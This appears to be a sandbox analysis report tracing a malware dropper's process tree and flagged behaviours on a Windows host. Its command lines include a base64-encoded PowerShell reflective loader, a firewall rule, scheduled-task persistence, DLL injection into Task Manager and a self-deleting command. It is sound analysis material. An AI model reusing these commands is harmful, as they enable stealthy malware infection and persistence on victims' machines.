6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5224	flt_shovemydiscoupyourarse.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5448	vmtoolsd.exe
3864	cmd.exe
3864	cmd.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1188	96513172.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	3028	FUCKER.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	1104	s1.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: 33	6108	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	6108	AUDIODG.EXE
Token: SeDebugPrivilege	5260	MSBuild.exe
Token: SeDebugPrivilege	2400	bin.exe
Token: SeDebugPrivilege	464	Dolzkqnsbh.exe
Token: SeDebugPrivilege	5612	asyns.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	2060	tasklist.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
4632	cp.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe
3124	u1w0.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3028 wrote to memory of 1684	3028	FUCKER.exe	94
PID 3028 wrote to memory of 1684	3028	FUCKER.exe	94
PID 3028 wrote to memory of 1684	3028	FUCKER.exe	94
PID 3028 wrote to memory of 4632	3028	FUCKER.exe	97
PID 3028 wrote to memory of 4632	3028	FUCKER.exe	97
PID 3028 wrote to memory of 4632	3028	FUCKER.exe	97
PID 3028 wrote to memory of 3444	3028	FUCKER.exe	99
PID 3028 wrote to memory of 3444	3028	FUCKER.exe	99
PID 3028 wrote to memory of 3444	3028	FUCKER.exe	99
PID 1684 wrote to memory of 928	1684	bd2.exe	102
PID 1684 wrote to memory of 928	1684	bd2.exe	102
PID 1684 wrote to memory of 928	1684	bd2.exe	102
PID 3028 wrote to memory of 1104	3028	FUCKER.exe	103
PID 3028 wrote to memory of 1104	3028	FUCKER.exe	103
PID 3028 wrote to memory of 1104	3028	FUCKER.exe	103
PID 3028 wrote to memory of 3844	3028	FUCKER.exe	106
PID 3028 wrote to memory of 3844	3028	FUCKER.exe	106
PID 3028 wrote to memory of 3844	3028	FUCKER.exe	106
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3444 wrote to memory of 3068	3444	lumma2.exe	107
PID 3028 wrote to memory of 2448	3028	FUCKER.exe	108
PID 3028 wrote to memory of 2448	3028	FUCKER.exe	108
PID 3028 wrote to memory of 2448	3028	FUCKER.exe	108
PID 928 wrote to memory of 1096	928	wscript.exe	109
PID 928 wrote to memory of 1096	928	wscript.exe	109
PID 928 wrote to memory of 1096	928	wscript.exe	109
PID 1096 wrote to memory of 4972	1096	cmd.exe	111
PID 1096 wrote to memory of 4972	1096	cmd.exe	111
PID 1096 wrote to memory of 4972	1096	cmd.exe	111
PID 2448 wrote to memory of 404	2448	ISetup3.exe	113
PID 2448 wrote to memory of 404	2448	ISetup3.exe	113
PID 2448 wrote to memory of 404	2448	ISetup3.exe	113
PID 2448 wrote to memory of 3124	2448	ISetup3.exe	161
PID 2448 wrote to memory of 3124	2448	ISetup3.exe	161
PID 2448 wrote to memory of 3124	2448	ISetup3.exe	161
PID 3844 wrote to memory of 1188	3844	twztl.exe	121
PID 3844 wrote to memory of 1188	3844	twztl.exe	121
PID 3844 wrote to memory of 1188	3844	twztl.exe	121
PID 1096 wrote to memory of 3008	1096	cmd.exe	126
PID 1096 wrote to memory of 3008	1096	cmd.exe	126
PID 1096 wrote to memory of 3008	1096	cmd.exe	126
PID 3028 wrote to memory of 5124	3028	FUCKER.exe	127
PID 3028 wrote to memory of 5124	3028	FUCKER.exe	127
PID 3844 wrote to memory of 5480	3844	twztl.exe	128
PID 3844 wrote to memory of 5480	3844	twztl.exe	128
PID 3844 wrote to memory of 5480	3844	twztl.exe	128
PID 1188 wrote to memory of 5892	1188	96513172.exe	130
PID 1188 wrote to memory of 5892	1188	96513172.exe	130
PID 1188 wrote to memory of 5892	1188	96513172.exe	130
PID 3124 wrote to memory of 6076	3124	u1w0.1.exe	131
PID 3124 wrote to memory of 6076	3124	u1w0.1.exe	131
PID 5124 wrote to memory of 6132	5124	momsstiflersdgjboigfnbio.exe	132
PID 5124 wrote to memory of 6132	5124	momsstiflersdgjboigfnbio.exe	132
PID 5124 wrote to memory of 6132	5124	momsstiflersdgjboigfnbio.exe	132
PID 6132 wrote to memory of 5448	6132	vmtoolsd.exe	133
PID 6132 wrote to memory of 5448	6132	vmtoolsd.exe	133
PID 6132 wrote to memory of 5448	6132	vmtoolsd.exe	133

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028
- C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Windows\SysWOW64\wscript.exe
    "wscript.exe" "C:\Users\Admin\start.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1096
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4972
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5836
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4068
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 1672
        7⤵
        Program crash
        
        PID:5436
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of FindShellTrayWindow
  PID:4632
- C:\Users\Admin\AppData\Local\Temp\Files\lumma2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lumma2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3444
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3068
- C:\Users\Admin\AppData\Local\Temp\Files\s1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\s1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1104
- C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
  2⤵
  - Windows security bypass
  - Executes dropped EXE
  - Windows security modification
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:3844
- - C:\Users\Admin\AppData\Local\Temp\96513172.exe
    C:\Users\Admin\AppData\Local\Temp\96513172.exe
    3⤵
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious behavior: SetClipboardViewer
    - Suspicious use of WriteProcessMemory
    PID:1188
  - - C:\Users\Admin\AppData\Local\Temp\3276515002.exe
      C:\Users\Admin\AppData\Local\Temp\3276515002.exe
      4⤵
      Executes dropped EXE
      PID:5892
  - - C:\Users\Admin\AppData\Local\Temp\248483651.exe
      C:\Users\Admin\AppData\Local\Temp\248483651.exe
      4⤵
      Executes dropped EXE
      PID:5820
  - - C:\Users\Admin\AppData\Local\Temp\192706194.exe
      C:\Users\Admin\AppData\Local\Temp\192706194.exe
      4⤵
      Executes dropped EXE
      PID:3124
  - - C:\Users\Admin\AppData\Local\Temp\2837029563.exe
      C:\Users\Admin\AppData\Local\Temp\2837029563.exe
      4⤵
      Executes dropped EXE
      PID:4736
- - C:\Users\Admin\AppData\Local\Temp\3006430217.exe
    C:\Users\Admin\AppData\Local\Temp\3006430217.exe
    3⤵
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Adds Run key to start application
    - Drops file in Windows directory
    PID:5480
- - C:\Users\Admin\AppData\Local\Temp\2595526574.exe
    C:\Users\Admin\AppData\Local\Temp\2595526574.exe
    3⤵
    - Executes dropped EXE
    PID:5756
- - C:\Users\Admin\AppData\Local\Temp\2476721870.exe
    C:\Users\Admin\AppData\Local\Temp\2476721870.exe
    3⤵
    - Executes dropped EXE
    PID:5292
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c shutdown /r
      4⤵
      PID:396
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown /r
        5⤵
        
        PID:3296
- C:\Users\Admin\AppData\Local\Temp\Files\ISetup3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ISetup3.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Users\Admin\AppData\Local\Temp\u1w0.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u1w0.0.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe"
      4⤵
      PID:3052
    - - C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1392
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe
        6⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        7⤵
        Runs ping.exe
        
        PID:4664
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2580
      4⤵
      Program crash
      PID:5144
- - C:\Users\Admin\AppData\Local\Temp\u1w0.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u1w0.1.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
      "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6076
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1188
    3⤵
    - Program crash
    PID:2420
- C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:5124
- - C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe
    C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:6132
  - - C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe
      "C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:5448
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3864
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5260
- C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
  2⤵
  - Executes dropped EXE
  PID:3956
- - C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4268
- C:\Users\Admin\AppData\Local\Temp\Files\crypted_15a94542.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_15a94542.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6104
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5252
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2608
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5244
- C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  PID:5224
- C:\Users\Admin\AppData\Local\Temp\Files\test2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\test2.exe"
  2⤵
  - Executes dropped EXE
  PID:5156
- C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3476
- C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe"
  2⤵
  - Executes dropped EXE
  PID:5488
- C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5612
- C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2400
- C:\Users\Admin\AppData\Local\Temp\Files\Dolzkqnsbh.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Dolzkqnsbh.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:464
- C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
  2⤵
  - Executes dropped EXE
  PID:5092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4336
- - C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
    3⤵
    PID:5744
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:852
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:5456
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2956
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:1748
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:5500
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:788
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:1892
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:5784
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4660
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:1968
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:448
- C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
  2⤵
  - Executes dropped EXE
  PID:6092
- - C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:1112
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2060
- C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe"
  2⤵
  PID:2128
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4796
- C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe"
  2⤵
  PID:5508
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:928
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4228
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:440
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4584
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4972
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 792
    3⤵
    - Program crash
    PID:4420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2448 -ip 2448
1⤵
PID:4628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:3
1⤵
PID:1476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3448 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
1⤵
PID:5860

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
- Executes dropped EXE
PID:5452

